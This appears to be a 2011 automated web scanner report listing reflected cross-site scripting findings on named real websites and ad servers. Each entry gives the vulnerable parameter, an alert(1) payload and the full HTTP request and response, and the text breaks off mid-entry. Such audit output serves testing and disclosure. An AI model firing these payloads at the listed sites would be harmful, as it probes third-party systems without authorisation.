The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 185ab"><script>alert(1)</script>eef67e67715 was submitted in the REST URL parameter 2. This input was echoed as 185ab\"><script>alert(1)</script>eef67e67715 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/video-jquerysub-explained185ab"><script>alert(1)</script>eef67e67715/ HTTP/1.1
Host: addyosmani.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 13:30:00 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Mon, 28 Feb 2011 13:30:00 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19708
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.o ...[SNIP]... <meta property="og:url" content="http://addyosmani.com/blog/video-jquerysub-explained185ab\"><script>alert(1)</script>eef67e67715/"/> ...[SNIP]...
3.2. http://addyosmani.com/blog/video-jquerysub-explained/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://addyosmani.com
Path: /blog/video-jquerysub-explained/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e32e5"><script>alert(1)</script>3283f8d61a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e32e5\"><script>alert(1)</script>3283f8d61a7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/video-jquerysub-explained/?e32e5"><script>alert(1)</script>3283f8d61a7=1 HTTP/1.1
Host: addyosmani.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the ctx request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c30e"style%3d"x%3aexpression(alert(1))"e970888ab2f was submitted in the ctx parameter. This input was echoed as 5c30e"style="x:expression(alert(1))"e970888ab2f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (CSS expressions are not evaluated from IE8 standards mode onward), and may not work on other browsers; the finding is the unencoded reflection into the attribute, not this particular payload, so a different payload for the same injection point should be tried when confirming impact.
Request
GET /AdServer/pvc.aspx?ctx=2P5NHNS4XIJO6-5JK1I9YRFLC-794ZA8LJ0UA05-794ZAAKK4W7C85c30e"style%3d"x%3aexpression(alert(1))"e970888ab2f HTTP/1.1 Host: ads.cpxadroit.com Proxy-Connection: keep-alive Referer: http://www.acelacomm.com/?epl=w58VndtRmVfVCfESVTOnHfQfKgdAQuEUyV38Udadr44INDdmKBIgWHLMrp42LeGXWECYgt5kZyVVihOljr0JdwvxYqsLk931uomhCTow3nMU7Ak0sMMEwlM6ISIbV76HxGrNemSgkTaaeogYPUVQY2igNml66qkZTRF1ACAQ3Oe_AADgfgUAAECAWwkAAP2HygFZUyZZQTE2aFpCfwAAAPA Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ALI20110228=1262-4-2544-36,2-5-130-97,8,24,1; PLI20110228=3392-4-1-8,8,24,1; SECPOP20110228=3392-3-1-72,8,24,1; CPX_3P=dlxdt=2/28/2011 8:24:20 AM; CPX=IG=1&VID=4ae8c3d0-29bc-4ccf-a280-cddde08d35bf&LS=4TI0ISSVP5SDA; CPXSEC=5JK3HMFKM39=794ZA8LJ0UA05,794ZAAKK4W7C8,2/28/2011 8:24:20 AM -05:00; CPX_IMP=2P5NHNS4XIJO6|5JK1I9YRFLC=794ZA8LJ0UA05,794ZAAKK4W7C8,2/28/2011 8:24:20 AM -05:00
The value of the r_num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b187'%3balert(1)//beb6c0fca6 was submitted in the r_num parameter. This input was echoed as 6b187';alert(1)//beb6c0fca6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /j?site_id=12169&pplacement_id=1&r_num=938774556b187'%3balert(1)//beb6c0fca6 HTTP/1.1 Host: ads1.revenue.net Proxy-Connection: keep-alive Referer: http://www.acelacomm.com/?epl=w58VndtRmVfVCfESVTOnHfQfKgdAQuEUyV38Udadr44INDdmKBIgWHLMrp42LeGXWECYgt5kZyVVihOljr0JdwvxYqsLk931uomhCTow3nMU7Ak0sMMEwlM6ISIbV76HxGrNemSgkTaaeogYPUVQY2igNml66qkZTRF1ACAQ3Oe_AADgfgUAAECAWwkAAP2HygFZUyZZQTE2aFpCfwAAAPA Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:24:13 GMT Server: Oversee Webserver v1.3.20 Vary: Accept-Encoding Cache-control: private, no-cache, must-revalidate Pragma: no-cache P3P: policyref="/w3c/revenue.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 26 Jul 1997 05:00:00 GMT Connection: close O_CREATIVE_ID: 227245 Set-Cookie: Train0=.CAC12OjE6MToxMjE2OToyMjcyNDU6MzQ0MDo5Mzg3NzQ1NTZiMTg3JzthbGVydCgxKS8vYmViNmMwZmNhNjoxOjBEBwY5ODk0MjY1Mzp4CAc5ODg5OTQ1MzotKQQABzEyOTg4OTk0NTMRAAA=; path=/; domain=.revenue.net; expires=Fri, 10 Jun 2022 05:05:41 GMT Content-Type: text/html Content-Length: 358
The value of the site_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d0c0'%3balert(1)//3f75a430514 was submitted in the site_id parameter. This input was echoed as 9d0c0';alert(1)//3f75a430514 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /j?site_id=121699d0c0'%3balert(1)//3f75a430514&pplacement_id=1&r_num=93877455 HTTP/1.1 Host: ads1.revenue.net Proxy-Connection: keep-alive Referer: http://www.acelacomm.com/?epl=w58VndtRmVfVCfESVTOnHfQfKgdAQuEUyV38Udadr44INDdmKBIgWHLMrp42LeGXWECYgt5kZyVVihOljr0JdwvxYqsLk931uomhCTow3nMU7Ak0sMMEwlM6ISIbV76HxGrNemSgkTaaeogYPUVQY2igNml66qkZTRF1ACAQ3Oe_AADgfgUAAECAWwkAAP2HygFZUyZZQTE2aFpCfwAAAPA Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:24:13 GMT Server: Oversee Webserver v1.3.20 Vary: Accept-Encoding Cache-control: private, no-cache, must-revalidate Pragma: no-cache P3P: policyref="/w3c/revenue.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 26 Jul 1997 05:00:00 GMT Connection: close O_CREATIVE_ID: 227245 Set-Cookie: Train0=.CAC52OjE6MToxMjE2OTlkMGMwJzthbGVydCgxKS8vM2Y3NWE0MzA1MTQ6MjI3MjQ1OjM0NDA6OTM4Nzc0NTU6MTowSAcGOTg5NDI2NTM6fAgHOTg4OTk0NTM6LSkEAAcxMjk4ODk5NDUzEQAA; path=/; domain=.revenue.net; expires=Fri, 10 Jun 2022 05:05:41 GMT Content-Type: text/html Content-Length: 359
3.6. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://adserving.cpxinteractive.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c63fd"-alert(1)-"50fd2b01cf1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?ad_type=pop&ad_size=0x0&section=1712140&banned_pop_types=29&pop_times=1&pop_frequency=0&pop_nofreqcap=1&c63fd"-alert(1)-"50fd2b01cf1=1 HTTP/1.1 Host: adserving.cpxinteractive.com Proxy-Connection: keep-alive Referer: http://www.acelacomm.com/?epl=w58VndtRmVfVCfESVTOnHfQfKgdAQuEUyV38Udadr44INDdmKBIgWHLMrp42LeGXWECYgt5kZyVVihOljr0JdwvxYqsLk931uomhCTow3nMU7Ak0sMMEwlM6ISIbV76HxGrNemSgkTaaeogYPUVQY2igNml66qkZTRF1ACAQ3Oe_AADgfgUAAECAWwkAAP2HygFZUyZZQTE2aFpCfwAAAPA Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:24:30 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Mon, 28 Feb 2011 13:24:30 GMT Pragma: no-cache Content-Length: 4419 Age: 0 Proxy-Connection: close
/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_pop_frequency = 0; rm_pop_times = 1; rm_pop_nofreqcap = 1; rm_pop_id = 1712140; rm_tag_type = "pop"; rm_url = "http://adserving.cpxinteractive.com/imp?Z=0x0&y=29&c63fd"-alert(1)-"50fd2b01cf1=1&s=1712140&_salt=3559519841";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if( ...[SNIP]...
3.7. http://advertise.tucows.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://advertise.tucows.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5f30"-alert(1)-"ad7c7214e7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?f5f30"-alert(1)-"ad7c7214e7c=1 HTTP/1.1 Host: advertise.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:30:01 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Set-Cookie: PHPSESSID=180d979498d64b5b166c42f709bb494f; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 180d979498d64b5b166c42f709bb494f=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 79305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Free Software and Sh ...[SNIP]... <script> loggedIn = false;
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ba05e<script>alert(1)</script>3c9d273d885 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/v1/ip.json?token=efb6d514cdcaa8a88ed8190a5011fe9532325aa8&callback=dbase_parseba05e<script>alert(1)</script>3c9d273d885 HTTP/1.1 Host: api.demandbase.com Proxy-Connection: keep-alive Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54bbf"><script>alert(1)</script>05fe234b217 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/TRACK_ATT54bbf"><script>alert(1)</script>05fe234b217/WiredRTB/Magnetic_DigitalTV_SX_NonSecure@Bottom3 HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://domdex.com/f?c=107&k=high%20speed%20internet%20service Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; dlx_XXX=set; ATTWired=ZapTrader; id=3375925924
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:24:39 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 373 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62ccd"><script>alert(1)</script>8039bdd084 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/TRACK_ATT/WiredRTB62ccd"><script>alert(1)</script>8039bdd084/Magnetic_DigitalTV_SX_NonSecure@Bottom3 HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://domdex.com/f?c=107&k=high%20speed%20internet%20service Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; dlx_XXX=set; ATTWired=ZapTrader; id=3375925924
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:24:41 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 455 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d785"><script>alert(1)</script>568dee12a6c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/TRACK_ATT/WiredRTB/Magnetic_DigitalTV_SX_NonSecure@Bottom36d785"><script>alert(1)</script>568dee12a6c HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://domdex.com/f?c=107&k=high%20speed%20internet%20service Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; dlx_XXX=set; ATTWired=ZapTrader; id=3375925924
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:24:46 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 365 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63282"><script>alert(1)</script>2c87a4f6b8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/TRACK_ATT63282"><script>alert(1)</script>2c87a4f6b8/WiredRTB/Magnetic_Internet_SX_NonSecure@Bottom3 HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://domdex.com/f?c=107&k=high%20speed%20internet%20service Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; dlx_XXX=set; ATTWired=ZapTrader; id=3375925924
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:24:39 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 372 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec351"><script>alert(1)</script>9177f754e13 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/TRACK_ATT/WiredRTBec351"><script>alert(1)</script>9177f754e13/Magnetic_Internet_SX_NonSecure@Bottom3 HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://domdex.com/f?c=107&k=high%20speed%20internet%20service Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; dlx_XXX=set; ATTWired=ZapTrader; id=3375925924
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:24:41 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 456 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62fa6"><script>alert(1)</script>4a633e43839 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/TRACK_ATT/WiredRTB/Magnetic_Internet_SX_NonSecure@Bottom362fa6"><script>alert(1)</script>4a633e43839 HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://domdex.com/f?c=107&k=high%20speed%20internet%20service Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; dlx_XXX=set; ATTWired=ZapTrader; id=3375925924
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:24:46 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 365 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5345525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b888"><script>alert(1)</script>410f0efdde5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/TRACK_ATT6b888"><script>alert(1)</script>410f0efdde5/WiredRTB/Magnetic_Phone_SX_NonSecure@Bottom3 HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://domdex.com/f?c=107&k=high%20speed%20internet%20service Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; dlx_XXX=set; ATTWired=ZapTrader; id=3375925924
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:24:39 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 368 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4ac3"><script>alert(1)</script>5ea9ffc9c85 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/TRACK_ATT/WiredRTBe4ac3"><script>alert(1)</script>5ea9ffc9c85/Magnetic_Phone_SX_NonSecure@Bottom3 HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://domdex.com/f?c=107&k=high%20speed%20internet%20service Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; dlx_XXX=set; ATTWired=ZapTrader; id=3375925924
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:24:41 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 453 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b380"><script>alert(1)</script>e8390eecd5a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/TRACK_ATT/WiredRTB/Magnetic_Phone_SX_NonSecure@Bottom34b380"><script>alert(1)</script>e8390eecd5a HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://domdex.com/f?c=107&k=high%20speed%20internet%20service Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; dlx_XXX=set; ATTWired=ZapTrader; id=3375925924
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:24:46 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 362 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660;path=/
3.18. http://bg.snow-forecast.com/login [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://bg.snow-forecast.com
Path:
/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbe3a"><script>alert(1)</script>4e447eee499 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?fbe3a"><script>alert(1)</script>4e447eee499=1 HTTP/1.1 Host: bg.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Mon, 28 Feb 2011 13:30:31 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "5183a95e1a38b3b6b7861cdde1b02a46" X-Runtime: 122 Content-Length: 20094 Set-Cookie: sfcsid=13eb1fb532654d23c12414d09dda95b2; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
3.19. http://blog.csdn.net/jiji262/archive/2007/07/28/1713771.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://blog.csdn.net
Path:
/jiji262/archive/2007/07/28/1713771.aspx
Issue detail
